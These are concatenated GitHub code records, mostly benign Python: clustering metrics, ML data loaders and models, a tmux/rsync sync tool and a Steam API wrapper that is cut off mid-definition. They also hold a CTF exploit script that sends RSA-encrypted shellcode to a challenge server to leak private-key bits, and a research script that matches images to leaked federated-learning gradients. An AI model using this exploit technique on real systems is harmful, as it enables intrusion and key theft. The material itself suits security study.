l_G_clusters_) # Coverage Score\n _f_perform = nx_comm.performance(G_simple_, l_G_clusters_) # Performance Score\n\n dict_quality_mesrs = {\n 'Station Types': _s_st_types,\n 'Station Quantity': _n_tot_num_st,\n 'Maximum Distance': _f_min_dist,\n 'Minimum Points': _n_min_pts,\n 'Name': _s_clust,\n 'Algorithm': _s_algo,\n 'Metric': _s_metric,\n 'Method': _s_method,\n 'Seed': _s_seed,\n 'Generated Cluster Count': _n_num_clust,\n 'Valid Cluster Count': _n_valid_clust,\n 'Clustered Station Count': _n_sts_in_clusters,\n 'Unclsutered Noise Count': _n_noise,\n 'Average Station Degree': _n_avg_deg,\n 'Degree Weighted Mean Absolute Error': _deg_wmae,\n 'Degree Error Station Count': _deg_err_st_count,\n 'Silhouette Coefficient': _f_silhouette,\n 'Calinski Harabaz score': _f_cal_har,\n 'Davies Bouldin score': _f_dav_bould,\n 'Dunn Index': _f_dunn,\n 'Modularity': _f_modul,\n 'Conductance Average': _f_conduct,\n 'Coverage Score': _f_cover,\n 'Performance Score': _f_perform,\n }\n# print('Dict qual',dict_quality_mesrs('Seed'))\n quality_metric_df = pd.DataFrame(dict_quality_mesrs, index=[_s_clust])\n quality_metric_df.reset_index(drop=True, inplace=True)\n\n except Exception as err:\n print(\"Class cluster_quality_metric [get_quality_metrics] Error message:\", err)\n# print(G_simple_.edges('distance'))\n print(traceback.format_exc())\n\n return quality_metric_df\n\n\n def __get_graph_n_labels(self, station_df):\n\n import sys; sys.path.insert(1, '../lib')\n import graph_clustering as gc\n import networkx as nx\n# import networkx.algorithms.community as nx_comm\n\n dict_feature_params = {\"distance_km\":self._max_distance,\n \"minimum_samples\":self._minimum_samples}\n\n cls_g_clust = gc.community_detection(**dict_feature_params)\n G_simple_ = cls_g_clust.get_simple_graph(station_df)\n #print(cloud_G_simple.nodes(data=True))\n\n _cloud_unique_labels = set(nx.get_node_attributes(G_simple_,'label').values())\n\n _l_cloud_g_cluster =[]\n for label in _cloud_unique_labels:\n selected_nodes = sorted([n for n,v in G_simple_.nodes(data=True) if v['label'] == label])\n if len(selected_nodes) > 0 and label != -1:\n _l_cloud_g_cluster.append(set(selected_nodes))\n elif len(selected_nodes) > 0 and label == -1:\n for st_node in selected_nodes:\n _l_cloud_g_cluster.append(set([st_node]))\n\n return G_simple_, _l_cloud_g_cluster\n\n ''' get_r_regular_clusters furhter removes those stations and clusters that do not comply with\n minPts and maxDist constraints\n '''\n def get_r_regular_clusters(self,_dict_reg_param,__st_clust_df):\n\n import sys; sys.path.insert(1, './lib')\n import pandas as pd\n import graph_clustering as gc\n import networkx as nx\n\n import traceback\n\n ''' Create subgraphs that comply with r-regularity where r >= minPts-1\n Given that the regularity is based on the average degree, change the scaling value 0.95\n to one that is desired and in the interval (0,1] to set a regularity threshold @_f_reg_thresh\n '''\n try:\n ''' Set the default paramters for the specific r-regularity method '''\n if 'force_regularity' in _dict_reg_param:\n if _dict_reg_param[\"force_regularity\"] in self._l_reg_methods:\n self._force_regularity=_dict_reg_param[\"force_regularity\"]\n else:\n raise ValueError('force_regularity must be {%s}'\n % str(self._l_reg_methods))\n\n if 'regularity_threshold' in _dict_reg_param:\n if isinstance(_dict_reg_param[\"tolerance_scaler\"],float) and _dict_reg_param[\"tolerance_scaler\"] < 1.0:\n self._reg_tol_scaler = _dict_reg_param[\"tolerance_scaler\"]\n else:\n raise ValueError('regularity_threshold must be %s in invalid and must be in the interval [0,1]'\n % str(_dict_reg_param[\"tolerance_scaler\"]))\n#d else:\n#d print('Unspecified regularity_threshold; using default value %0.2f' % (self._reg_tol_scaler))\n\n ''' (n-1)-simplicies equalant to the regularity required to ensure all target-site stations\n have the minimum required target station connections '''\n _f_reg_thresh = self._reg_tol_scaler*(self._minimum_samples - 1)\n\n lst_G_simple = []\n ''' Only plot valid clusters '''\n no_noise_df = __st_clust_df[__st_clust_df['label']!= -1]\n# print('%d clusters after removing the noise clusters; i.e. label = -1'\n# % len(no_noise_df['label'].unique()))\n\n dict_feature_params = {\"distance_km\": self._max_distance,\n \"minimum_samples\": self._minimum_samples}\n#p print(\"Regularity processing maxDist < %0.2f and minPts > %d\"\n#p % (dict_feature_params[\"distance_km\"],\n#p dict_feature_params[\"minimum_samples\"]-1))\n cls_g_clust = gc.community_detection(**dict_feature_params)\n G_simple = cls_g_clust.get_simple_graph(no_noise_df)\n G_simple.remove_nodes_from(list(nx.isolates(G_simple)))\n if not nx.is_empty(G_simple):\n lst_G_simple = cls_g_clust.get_list_subgraphs(G_simple)\n#p print('\\n%d simple subgraphs created after removing clusters with isolated nodes' % len(lst_G_simple))\n\n ''' remove any graphs with zero average degree '''\n incomplete = True #flag to start stop while loop\n while incomplete and self._force_regularity != \"None\":\n incomplete = False\n ''' As a precaution first remove all subgraphs with zero degree nodes; i.e. singletons '''\n for G_idx, G in enumerate(lst_G_simple):\n if len(G.edges()) == 0:\n lst_G_simple.pop(G_idx)\n#p print('...removed subgraph %d with zero degree' % G_idx)\n incomplete = True\n\n for G_idx, G in enumerate(lst_G_simple):\n#p print(\"\\nGraph degree:\",G.degree())\n\n ''' Average regularity function '''\n degree_sequence = sorted([d for n, d in G.degree()], reverse=True)\n _avg_degree = sum(degree_sequence)/len(degree_sequence)\n if self._force_regularity == 'Average' and _avg_degree <= _f_reg_thresh:\n ''' try to pop if G_idx fails pass and will catch in the next round '''\n try:\n lst_G_simple.pop(G_idx)\n#p print('...removed subgraph %d with average degree %0.02f <= %0.02f tolerated degree'\n#p % (G_idx, _avg_degree,_f_reg_thresh))\n incomplete = True\n except Exception as err:\n pass\n\n elif self._force_regularity == 'Absolute':\n ''' Absolute regularity function forces strict minimal regularity '''\n H = nx.Graph(G)\n# remove = [n for n,d in dict(H.degree()).items()\n# if int(d) < int(self._minimum_samples-1)]\n remove = [n for n,d in H.degree()\n if int(d) < int(self._minimum_samples)]\n if len(remove) > 0:\n#p print('...removing nodes %s with degree < %d' % (remove, int(self._minimum_samples-1)))\n H.remove_nodes_from(remove)\n if H.number_of_nodes() > 0:\n lst_G_simple.pop(G_idx)\n lst_G_simple.append(H)\n#p print('...replaced subgraph %d with reduced nodes=%d'\n#p % (G_idx, H.number_of_nodes()))\n else:\n#p print('...removing subgraph %d with %d nodes after node removal'\n#p % (G_idx, H.number_of_nodes()))\n lst_G_simple.pop(G_idx)\n incomplete = True\n elif self._force_regularity == 'minPoints':\n ''' minPoints function remove clusters with size < minimum_samples '''\n if G.number_of_nodes() < self._minimum_samples:\n lst_G_simple.pop(G_idx)\n\n ''' Modify the station dataframe to reflect the new noise and cluster labels '''\n new_st_clust_df_ = __st_clust_df.copy()\n\n if self._force_regularity != \"None\":\n new_st_clust_df_[\"label\"] = -1\n if len(lst_G_simple) > 0:\n for G_idx, G in enumerate(lst_G_simple):\n# print(self._minimum_samples)\n# print(\"reg fn\",[d for n,d in G.degree()])\n _nodes = sorted([n for n,v in G.nodes(data=True)])\n new_st_clust_df_.loc[new_st_clust_df_[\"st_name\"].isin(_nodes),\"label\"] = G_idx\n\n except Exception as err:\n print(\"Class cluster_quality_metric [get_r_regular_clusters] Error message:\", err)\n print(traceback.format_exc())\n\n return new_st_clust_df_, lst_G_simple\n","repo_name":"waidyanatha/quasar","sub_path":"lib/cluster_quality.py","file_name":"cluster_quality.py","file_ext":"py","file_size_in_byte":27068,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"37905377186","text":"#!/usr/bin/env python\nimport numpy as np\nimport coffea.processor as processor\n\nfrom coffea import hist\nfrom coffea.analysis_objects import JaggedCandidateArray\n\n\ndef setup_candidates(df):\n \"\"\"Set up Physics candidates.\n\n Args:\n df ([type]): The dataframe containing the TTree data (must be flattened!)\n \"\"\"\n jets = JaggedCandidateArray.candidatesfromcounts(\n df[\"nHLTJets\"],\n pt=df[\"HLTJets_pt\"],\n eta=df[\"HLTJets_eta\"],\n phi=df[\"HLTJets_phi\"],\n mass=df[\"HLTJets_phi\"] * 0.,\n abseta=np.abs(df[\"HLTJets_eta\"]),\n sieie=df[\"HLTJets_sigmaEtaEta\"],\n sipip=df[\"HLTJets_sigmaPhiPhi\"],\n cssize=df[\"HLTJets_centralEtaStripSize\"],\n adssize=df[\"HLTJets_adjacentEtaStripsSize\"]\n )\n\n muons = JaggedCandidateArray.candidatesfromcounts(\n df[\"nHLTMuon\"],\n pt=df[\"HLTMuon_pt\"],\n eta=df[\"HLTMuon_eta\"],\n phi=df[\"HLTMuon_phi\"],\n mass=df[\"HLTMuon_phi\"]*0.,\n abseta=np.abs(df[\"HLTMuon_eta\"]),\n )\n\n met_pt = df[\"HLTMET_pt\"]\n met_phi = df[\"HLTMET_phi\"]\n\n return jets, muons, met_pt, met_phi","repo_name":"alpakpinar/HFShapeAnalyzer","sub_path":"candidates.py","file_name":"candidates.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18726909204","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\ndef dataset(directory,size,batchsize):\n\n def _parseOne(ser_example):\n features = {\n \"img_raw\":tf.FixedLenFeature(shape=[],dtype=tf.string),\n \"label\":tf.FixedLenFeature(shape=[],dtype=tf.int64)}\n parsed_example = tf.parse_single_example(ser_example,features)\n\n image = tf.decode_raw(parsed_example[\"img_raw\"],out_type=tf.uint8)\n image = tf.reshape(image,size)\n image = tf.cast(image,tf.float32)*(1./255)-0.5\n\n label = parsed_example[\"label\"]\n label = tf.cast(label,tf.int32)\n label = tf.one_hot(label,depth=2,on_value=1)\n\n return image,label\n\n dataset = tf.data.TFRecordDataset(directory)\n dataset = dataset.map(_parseOne)\n dataset = dataset.batch(batchsize)\n dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)\n\n return dataset\n\ndef showRes(subplot,title,thisimg):\n p = plt.subplot(subplot)\n p.axis(\"off\")\n p.imshow(thisimg)\n p.set_title(title)\n\ndef showimg(index,label,img,ntop):\n plt.figure(figsize=(20,10))\n plt.axis(\"off\")\n ntop = min(9,ntop)\n print(index)\n for i in range(ntop):\n showRes(100+10*ntop+1+i,label[i],img[i])\n plt.show()\n\ndef getOne(dataset):\n iterator = dataset.make_one_shot_iterator()\n elem = iterator.get_next()\n return elem\n\nsample_dir = [\"mydata.tfrecords\"]\nsize = [256,256,3]\nbatchsize = 10\ntdataset = dataset(sample_dir,size,batchsize)\n\nprint(tdataset.output_types)\nprint(tdataset.output_shapes)\n\nelem = getOne(tdataset)\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n try:\n for step in range(1):\n value = sess.run(elem)\n showimg(step,value[1],np.asarray((value[0]+0.5)*255,np.uint8),10)\n except tf.errors.OutOfRangeError:\n print(\"Done!!\")\n\n","repo_name":"chensheng19/Tensorflow-Project-practice","sub_path":"chapter-4/example_8.py","file_name":"example_8.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28916072377","text":"from typing import Callable\nimport torch\nimport torch.nn as nn\n\n\nclass SLPBlock(nn.Module):\n \"\"\"\n _activation_fun_dict -> dict[str, callable]\n \"\"\"\n _activation_fun_dict: dict = {\n \"relu\": nn.functional.relu,\n \"tanh\": nn.functional.tanh,\n \"sigmoid\": nn.functional.sigmoid,\n \"none\": lambda x: x,\n }\n\n def __init__(self,\n in_size: int,\n out_size: int,\n activation_fun: str = \"relu\",\n batch_norm: bool = True,\n dropout: float = 0.0) -> None:\n super().__init__()\n self.layer = nn.Linear(in_size, out_size)\n self.bn = nn.BatchNorm1d(out_size) if batch_norm is True else None\n assert activation_fun in self._activation_fun_dict.keys()\n self.act_fun = self._activation_fun_dict[activation_fun]\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n out = self.layer(x)\n if self.bn is not None:\n out = self.bn(out)\n out = self.act_fun(out)\n return self.dropout(out)\n\n\nclass MLP(nn.Module):\n def __init__(self, block_list: list) -> None:\n \"\"\"\n block_list -> list[dict]\n \"\"\"\n super().__init__()\n self.blocks = nn.ModuleList([\n SLPBlock(**block_conf) for block_conf in block_list\n ])\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n out = x\n for block in self.blocks:\n out = block(out)\n return out\n","repo_name":"pskiers/Metric-Learning-KL-loss","sub_path":"model/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4645601093","text":"import torch\nfrom breaching.cases.data.datasets_vision import _build_dataset_vision, _parse_data_augmentations\nfrom omegaconf import OmegaConf\nimport random\n\nimg_scale = 112\nbase_dir = \"..\"\nnum_sample= 100\ntarget_cfg_data = {'db': {'name': None}, 'name': 'bFFHQ_Gender', 'modality': 'vision', 'task': 'classification', 'path': '../data', 'size': 19200, 'classes': 2, 'scale': 112, 'shape': [3, img_scale, img_scale], 'normalize': True, 'mean': [0.4914, 0.4822, 0.4465], 'std': [0.2023, 0.1994, 0.201], 'augmentations_train': {'RandomResizedCrop': img_scale, 'RandomHorizontalFlip': 0.5}, 'augmentations_val': {'Resize': img_scale}, 'augmentations_ats': {'policy':None}, 'default_clients': 100, 'partition': 'random', 'examples_from_split': 'valid', 'batch_size': 128, 'caching': False}\n\n\ncelebahq_cfg_data = {'db': {'name': None}, 'name': 'CelebaHQ_Gender', 'modality': 'vision', 'task': 'classification', 'path': '../data', 'size': 30000, 'classes': 2, 'scale': 112, 'shape': [3, img_scale, img_scale], 'normalize': True, 'mean': [0.506, 0.425, 0.382], 'std': [0.265, 0.245, 0.241], 'augmentations_train': {'RandomResizedCrop': img_scale, 'RandomHorizontalFlip': 0.5}, 'augmentations_val': {'Resize': img_scale}, 'augmentations_ats': {'policy':None}, 'default_clients': 100, 'partition': 'random', 'examples_from_split': 'valid', 'batch_size': 128, 'caching': False}\n\nlfw_cfg_data = {'db': {'name': None}, 'name': 'LFWA_Gender', 'modality': 'vision', 'task': 'classification', 'path': '/home/zx/data', 'size': 13000, 'classes': 2, 'scale': 112, 'shape': [3, img_scale, img_scale], 'normalize': True, 'mean': [0.439, 0.383, 0.342], 'std': [0.297, 0.273, 0.268], 'augmentations_train': {'RandomResizedCrop': img_scale, 'RandomHorizontalFlip': 0.5}, 'augmentations_val': {'Resize': img_scale}, 'default_clients': 100, 'partition': 'random', 'examples_from_split': 'valid', 'batch_size': 128, 'caching': False}\n\n\n\nori_cfg_data = celebahq_cfg_data # or lfw_cfg_data\n\ntarget_cfg_data = OmegaConf.create(target_cfg_data)\nori_cfg_data = OmegaConf.create(ori_cfg_data)\n\n#load model and loss_fn\nfrom breaching.cases.models.model_preparation import construct_model\ncfg_model = \"ResNet18\"\nstate_dict_path = \"\" #provide the trained model\n\n\nstate_dict = torch.load(state_dict_path)\nmodel, loss_fn = construct_model(cfg_model=cfg_model, cfg_data=ori_cfg_data, pretrained=False)\nmodel.model.load_state_dict(state_dict)\n\n\n\n#load target dataset\ntarget_dataset, collect_fn = _build_dataset_vision(cfg_data=target_cfg_data, split='train')\ntarget_dataset.transform = None # do not set the transformation for target images\n\n####load sample from dataset\nsample_list = random.sample(range(len(target_dataset)), num_sample) \nori_transform = _parse_data_augmentations(cfg_data=target_cfg_data, split=\"valid\") # only use valid transform for random images\n\n\ndef compute_feature(gradients, labels):\n import torch \n weights = gradients[-2]\n bias = gradients[-1]\n grads_fc_debiased = weights / bias[:, None]\n features_per_label = []\n for label in labels:\n if bias[label] != 0:\n features_per_label.append(grads_fc_debiased[label])\n else:\n features_per_label.append(torch.zeros_like(grads_fc_debiased[0]))\n return torch.stack(features_per_label)\n\n\n\nclass _LinearFeatureHook:\n \"\"\"Hook to retrieve input to given module.\"\"\"\n\n def __init__(self, module):\n self.features = None\n self.hook = module.register_forward_hook(self.hook_fn)\n\n def hook_fn(self, module, input, output):\n input_features = input[0]\n self.features = input_features\n\n def close(self):\n self.hook.remove()\n\n\nfor module in model.modules():\n if isinstance(module, torch.nn.Linear):\n target_refs = _LinearFeatureHook(module)\n\n\ndef get_closest_img(num_sample, gradient_dir, target_dataset, sample_list, ori_transform, reverse=False):\n closest_imgs_idx = []\n for idx, in range(num_sample):\n \n #read gradients from dir \n ori_gradients = torch.load(os.path.join(gradient_dir, f\"gradients_{idx}.pth\"))\n ori_features = compute_feature(ori_gradients, [0])\n\n distance = []\n\n for target_img_idx in sample_list:\n target_img, target_label = target_dataset[target_img_idx]\n\n transform_target_img = ori_transform(target_img)\n \n target_loss =loss_fn(model(transform_target_img.unsqueeze(0)), torch.tensor([target_label]))\n target_features = target_refs.features\n\n ##sort the distance\n distance.append((ori_features - target_features.to(ori_features.device)).pow(2).mean()) \n \n closest_imgs_idx.append(sample_list[torch.argmin(torch.tensor(distance)).item()]) \n return closest_imgs_idx\n \n#save the image\n\nimport os\ngradient_dir =f\"{base_dir}/breaching/gradients/celebahq\"\n# gradint_dir =f\"{base_dir}/breaching/gradients/lfwa\"\n\n\nclosest_imgs_idx = get_closest_img(num_sample=num_sample, gradient_dir=gradient_dir, target_dataset=target_dataset, sample_list=sample_list, ori_transform=ori_transform)\nsave_dir = f\"{base_dir}/breaching/out/celeba_hq/search/112\"\n# save_dir = f\"{base_dir}/breaching/out/lfw/search/112\"\n\nfrom PIL import Image\nimport os\nfor idx, img_idx in enumerate(closest_imgs_idx):\n target_img, _ = target_dataset[img_idx]\n if isinstance(target_img, torch.Tensor):\n import torchvision\n \n target_img = torchvision.transforms.ToPILImage()(target_img)\n if not isinstance(target_img, Image.Image):\n raise TypeError(\"Target image should be PIL Image object\")\n user_save_dir = os.path.join(os.path.join(save_dir, f\"user{idx}\"))\n if not os.path.exists(user_save_dir):\n os.makedirs(user_save_dir, exist_ok=True)\n target_img.save(os.path.join(user_save_dir, \"0.png\"))\n","repo_name":"LuckMonkeys/DFLeak","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31078837789","text":"#!/usr/bin/python\nfrom pwn import *\nfrom Crypto.PublicKey import RSA\nfrom hashlib import sha256\n\nimport sys\nimport string\nimport multiprocessing as mp\nimport itertools as it\n\nhost = 'shellcode.balsnctf.com'\nport = 4001\n\nhead = ''\n\ndef check(inp):\n now = head + ''.join(inp)\n now = sha256(now).hexdigest()[:2]\n if now == '00':\n return ''.join(inp)\n\n\ndef PoW():\n global head\n r.recvuntil('sha256(')\n head = r.recvuntil(' ')[:-1]\n r.recvuntil('answer =')\n p = mp.Pool(3)\n poss = string.digits + string.ascii_letters\n iterator = it.product(poss, repeat=2)\n print ('start')\n ret = p.map(check, iterator)\n print ('end')\n for i in ret:\n if i is None:\n continue\n r.sendline(i)\n break\n\n\nRSA_LENGTH = 1024\n\ncontext.arch = 'amd64'\npayload='''\nadd rsp, 0x18;\npop rsi;\nsub rsi, 0x4e;\nxor edi, edi;\ninc edi;\nxor edx, edx;\nadd edx, 0x36;\nxor eax, eax;\ninc eax;\nsyscall;\n'''\n\n\nkey = RSA.importKey(open('pub.pem'))\nadjust = asm('push rax;\\npop rax')\npayload = asm(payload)\nlength = len(payload)\nprint (length)\nadd_adjust = (((RSA_LENGTH // 8) - length) // 2) * adjust\n# payload = add_adjust + payload\npayload = payload.ljust(128, '\\x00')\nassert len(payload) == RSA_LENGTH // 8\n\npayload = int(payload.encode('hex'), 16)\npayload = pow(payload, key.e, key.n)\n\npayload = hex(payload)[2:].strip('L')\nif len(payload) % 2 != 0:\n payload = '0' + payload\npayload = payload.decode('hex')\n\nr = remote(host, port)\nPoW()\nsys.stdout.write(r.recvuntil(':'))\nr.sendline(payload)\nsys.stdout.write(r.recvuntil('stuff...\\n'))\nr.recvn(0x10)\nret = ''.join(reversed(r.recvn(38)))\nprint (ret.encode('hex'))\nprint (hex(key.d)[2:].strip('L'))\nleast_304_bits_private_key = int(ret.encode('hex'), 16)\nprint (least_304_bits_private_key)\nr.interactive()\n\n","repo_name":"b04902036/balsnctf-2019","sub_path":"shellcode_writer/share/solution/leak_private_key.py","file_name":"leak_private_key.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"37704337379","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nimport time\nimport argparse\nimport subprocess\nimport logging\nimport importlib\nfrom pathlib import Path\nfrom datetime import datetime\n\nimport libtmux\nimport hosts\nfrom prettytable import PrettyTable\n\n\ndef strfdelta(tdelta, fmt):\n d = {\"days\": tdelta.days}\n d[\"hours\"], rem = divmod(tdelta.seconds, 3600)\n d[\"minutes\"], d[\"seconds\"] = divmod(rem, 60)\n return fmt.format(**d)\n\n\nclass Syncode(object):\n def __init__(self, cfg):\n self.cfg = cfg\n self.app_name = cfg.app_name\n self.session_name = cfg.app_name\n self.logger = self._get_logger(self.session_name, Path(cfg.log_path))\n self.job_count = {'runing': 0, 'crashed': 0}\n self.session = self._get_session(self.app_name)\n self.jobs = []\n\n def run(self):\n while True:\n self._check_run_jobs()\n self._add_new_jobs()\n self._start_new_jobs()\n self._flush_monitor()\n time.sleep(self.cfg.sleep_interval)\n\n def _check_run_jobs(self):\n for job in self.jobs:\n # @TODO: find a better way to check window's state\n # @TODO: how to address error\n if job['state'] == 'runing':\n try:\n if len(job['window'].attached_pane) == 0:\n job.update({\n 'state': 'crashed',\n 'stop_time': datetime.now(),\n })\n self.job_count['run'] -= 1\n self.job_count['crashed'] += 1\n\n self.logger.info(f'finish job {job[\"name\"]}')\n\n except Exception as e:\n job.update({\n 'state': 'crashed',\n 'stop_time': datetime.now(),\n })\n\n self.job_count['runing'] -= 1\n self.job_count['crashed'] += 1\n\n self.logger.info(f'finish job {job[\"name\"]}')\n self.logger.error(e)\n\n def _add_new_jobs(self):\n importlib.reload(hosts)\n from hosts import HOSTS\n for sess_name, host in HOSTS.items():\n cmd = f'''when-changed -v -r -1 -s {host['source_path']} -c \\\"rsync -auvz --timeout=5 {host['source_path']}/ {host['host_name']}:{host['dest_path']}; echo \\\\\"\\\\033[0;31m\\\\$(date)\\\\033[0m\\\\n\\\\\"\\\" '''\n print(cmd)\n if not self._job_exists(sess_name):\n self.jobs.append({\n 'name': sess_name,\n 'state': 'wait',\n 'cmd': cmd,\n 'window': None,\n 'window_index': None,\n 'start_time': None,\n 'stop_time': None,\n })\n\n self.logger.info(f'add job {sess_name}')\n\n def _job_exists(self, sess_name):\n for job in self.jobs:\n if job['name'] == sess_name:\n return True\n return False\n\n def _start_new_jobs(self):\n for job in self.jobs:\n if job['state'] == 'wait':\n cmd = job[\"cmd\"]\n window = self.session.new_window(attach=False, window_name=job['name'], window_shell=cmd)\n\n job.update({\n 'window': window,\n 'window_index': window['window_index'],\n 'state': 'runing',\n 'start_time': datetime.now(),\n })\n\n self.job_count['runing'] += 1\n\n self.logger.info(f'start job {job[\"name\"]}')\n\n time.sleep(5) # avoid start jobs at the same time\n\n def _flush_monitor(self):\n subprocess.call(\"clear\")\n\n table = PrettyTable()\n table.field_names = ['Name', 'State', 'Tmux', 'Start', 'Stop', 'Duration (s)']\n\n cmds = []\n for job in self.jobs:\n start_time = '' if job['start_time'] is None else \\\n job['start_time'].strftime(\"%Y/%m/%d %H:%M:%S\")\n stop_time = '' if job['stop_time'] is None else \\\n job['stop_time'].strftime(\"%Y/%m/%d %H:%M:%S\")\n duration = '' if job['stop_time'] is None else \\\n strfdelta((job['stop_time'] - job['start_time']),\n '{days} days {hours}:{minutes}:{seconds}')\n table.add_row([job['name'], job['state'], job['window_index'], start_time, stop_time, duration])\n cmds.append(job['cmd'])\n\n print(table)\n print(f'{datetime.now().strftime(\"%b %d %Y %H:%M:%S\")} ({self.cfg.sleep_interval}s) '\n f'runing: {self.job_count[\"runing\"]} crashed: {self.job_count[\"crashed\"]}')\n\n print('\\n'.join(cmds))\n\n def _get_session(self, name):\n server = libtmux.Server()\n\n session = server.find_where({'session_name': name})\n if session is None:\n session = server.new_session(session_name=name, attach=False)\n\n return session\n\n def _get_logger(self, name, save_dpath):\n logger = logging.getLogger(name)\n logger.setLevel(logging.INFO)\n\n formatter = logging.Formatter(\n \"%(asctime)s: %(levelname)5s [%(filename)s:%(lineno)4d] %(message)s\",\n \"%Y-%m-%d %H:%M:%S\")\n\n log_fpath = save_dpath / f'{name}-{datetime.now().strftime(\"%Y%m%d%H%M%S\")}.log'\n log_fpath.parent.mkdir(parents=True, exist_ok=True)\n\n fh = logging.FileHandler(log_fpath)\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n return logger\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=None,\n # show default in -h\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('-c', '--config', dest='config_path', type=Path,\n default='./xxx',)\n parser.add_argument('-l', '--log', dest='log_path', type=Path,\n default='./logs/',)\n parser.add_argument('-n', '--name', dest='app_name', type=str,\n default='Syncode',)\n parser.add_argument('-i', '--interval', dest='sleep_interval', type=int,\n default=60)\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_args()\n syncode = Syncode(args)\n syncode.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lampvision/syncode","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39893868138","text":"import requests\nimport json\n\nclass SteamAPI():\n def __init__(self, apikey):\n self.apikey = apikey\n self.r = requests.Session()\n\n def get(self, path, version, params={}):\n params['format'] = 'json'\n url = \"https://api.steampowered.com/%s/%s/\" % (path, version)\n r = self.r.get(url, params=params)\n return r.json()\n\n def GetSupportedAPIList(self):\n '''Get all APIs'''\n path = \"ISteamWebAPIUtil/GetSupportedAPIList\"\n version = \"v0001\"\n params = {}\n return self.get(path, version, params)\n\n # GetNewsForApp (v0002)\n def GetNewsForApp(self, appid, count=1, maxlength=300):\n '''GetNewsForApp returns the latest of a game specified by its appID.'''\n path = \"ISteamNews/GetNewsForApp\"\n version = \"v0002\"\n params = {\n \"appid\": appid,\n \"count\": count,\n \"maxlength\": maxlength\n }\n return self.get(path, version, params)\n\n # GetGlobalAchievementPercentagesForApp (v0002)\n def GetGlobalAchievementPercentagesForApp(self, gameid):\n '''Returns on global achievements overview of a specific game in percentages.'''\n path = \"ISteamUserStats/GetGlobalAchievementPercentagesForApp\"\n version = \"v0002\"\n params = {\n \"gameid\": gameid\n }\n return self.get(path, version, params)\n\n # GetGlobalStatsForGame (v0001)\n def GetGlobalStatsForGame(self, appid, name=[], count=1):\n \"\"\"\n Note: name is a list of achievement names\n \"\"\"\n path = 'ISteamUserStats/GetGlobalStatsForGame'\n version = 'v0001'\n params = {\n 'appid': appid,\n 'count': count\n }\n i = 0\n for n in name:\n params[\"name[%s]\" % i] = n\n i += 1\n print(params)\n return self.get(path, version, params)\n\n # GetPlayerSummaries (v0002)\n def GetPlayerSummaries(self, steamids):\n '''Returns basic profile information for a list of 64-bit Steam IDs.'''\n path = \"ISteamUser/GetPlayerSummaries\"\n version = \"v0002\"\n params = {\n \"key\": self.apikey,\n \"steamids\": steamids\n }\n return self.get(path, version, params)\n\n # GetFriendList (v0001)\n def GetFriendList(self, steamid, relationship='friend'):\n '''Returns the friend list of any Steam user, provided their Steam Community profile visibility is set to \"Public\".'''\n path = \"ISteamUser/GetFriendList\"\n version = \"v0001\"\n params = {\n \"key\": self.apikey,\n \"steamid\": steamid,\n \"relationship\": relationship\n }\n return self.get(path, version, params)\n\n # GetPlayerAchievements (v0001)\n def GetPlayerAchievements(self, appid, steamid, l=\"en\"):\n '''Returns a list of achievements for this user by app id'''\n path = \"ISteamUserStats/GetPlayerAchievements\"\n version = \"v0001\"\n params = {\n \"key\": self.apikey,\n \"steamid\": steamid,\n \"appid\": appid,\n \"l\": l\n }\n return self.get(path, version, params)\n\n # GetUserStatsForGame (v0002)\n def GetUserStatsForGame(self, appid, steamid, l=\"en\"):\n '''Returns a list of achievements for this user by app id'''\n path = \"ISteamUserStats/GetUserStatsForGame\"\n version = \"v0002\"\n params = {\n \"key\": self.apikey,\n \"steamid\": steamid,\n \"appid\": appid,\n \"l\": l\n }\n return self.get(path, version, params)\n\n # GetOwnedGames (v0001)\n def GetOwnedGames(self, steamid, include_appinfo=False, include_played_free_games=False, appids_filter=[]):\n '''\n GetOwnedGames returns a list of games a player owns along with some \n playtime information, if the profile is publicly visible. Private, \n friends-only, and other privacy settings are not supported unless you \n are asking for your own personal details (ie the WebAPI key you are \n using is linked to the steamid you are requesting).\n '''\n path = \"IPlayerService/GetOwnedGames\"\n version = \"v0001\"\n params = {\n \"key\": self.apikey,\n \"steamid\": steamid,\n \"include_appinfo\": include_appinfo,\n \"include_played_free_games\": include_played_free_games,\n \"appids_filter\": appids_filter,\n }\n return self.get(path, version, params)\n\n # GetRecentlyPlayedGames (v0001)\n def GetRecentlyPlayedGames(self, steamid, count=200):\n '''\n GetRecentlyPlayedGames returns a list of games a player has played in \n the last two weeks, if the profile is publicly visible. Private, \n friends-only, and other privacy settings are not supported unless you \n are asking for your own personal details (ie the WebAPI key you are \n using is linked to the steamid you are requesting).\n '''\n path = \"IPlayerService/GetRecentlyPlayedGames\"\n version = \"v0001\"\n params = {\n \"key\": self.apikey,\n \"steamid\": steamid,\n \"count\": count\n }\n return self.get(path, version, params)\n \n # IsPlayingSharedGame (v0001)\n def 